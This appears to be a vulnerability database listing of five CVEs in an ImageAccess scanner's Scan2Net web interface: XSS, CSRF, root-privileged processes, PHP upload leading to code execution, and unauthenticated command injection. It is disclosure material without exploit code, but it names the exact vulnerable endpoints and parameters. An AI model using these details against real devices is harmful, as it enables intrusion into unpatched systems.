CVSS: 4.7EPSS: 0%CPEs: 1EXPL: 0CVE-2024-28142 – Stored cross site scripting
https://notcve.org/view.php?id=CVE-2024-28142
Due to missing input sanitization, an attacker can perform cross-site-scripting attacks and run arbitrary Javascript in the browser of other users. The "File Name" page (/cgi/uset.cgi?-cfilename) in the User Settings menu improperly filters the "file name" and wildcard character input field. By exploiting the wildcard character feature, attackers are able to store arbitrary Javascript code which is being triggered if the page is viewed afterwards, e.g. by higher privileged users such as admins. This attack can even be performed without being logged in because the affected functions are not fully protected. Without logging in, only the file name parameter of the "Default" User can be changed. • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 6.3EPSS: 0%CPEs: 1EXPL: 0CVE-2024-28141 – Cross-Site Request-Forgery
https://notcve.org/view.php?id=CVE-2024-28141
The web application is not protected against cross-site request forgery attacks. Therefore, an attacker can trick users into performing actions on the application when they visit an attacker-controlled website or click on a malicious link. E.g. an attacker can forge malicious links to reset the admin password or create new users. • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-352: Cross-Site Request Forgery (CSRF) •
CVSS: 6.1EPSS: 0%CPEs: 1EXPL: 0CVE-2024-28140 – Violation of Least Privilege Principle
https://notcve.org/view.php?id=CVE-2024-28140
The scanner device boots into a kiosk mode by default and opens the Scan2Net interface in a browser window. This browser is run with the permissions of the root user. There are also several other applications running as root user. This can be confirmed by running "ps aux" as the root user and observing the output. • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-250: Execution with Unnecessary Privileges •
CVSS: 7.2EPSS: 0%CPEs: 1EXPL: 0CVE-2024-47946 – OS Command Execution through Arbitrary File Upload
https://notcve.org/view.php?id=CVE-2024-47946
If the attacker has access to a valid Poweruser session, remote code execution is possible because specially crafted valid PNG files with injected PHP content can be uploaded as desktop backgrounds or lock screens. After the upload, the PHP script is available in the web root. The PHP code executes once the uploaded file is accessed. This allows the execution of arbitrary PHP code and OS commands on the device as "www-data". • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-434: Unrestricted Upload of File with Dangerous Type •
CVSS: 7.3EPSS: 0%CPEs: 1EXPL: 0CVE-2024-28138 – OS Command Injection
https://notcve.org/view.php?id=CVE-2024-28138
An unauthenticated attacker with network access to the affected device's web interface can execute any system command via the "msg_events.php" script as the www-data user. The HTTP GET parameter "data" is not properly sanitized. • https://r.sec-consult.com/imageaccess https://www.imageaccess.de/?page=SupportPortal&lang=en • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •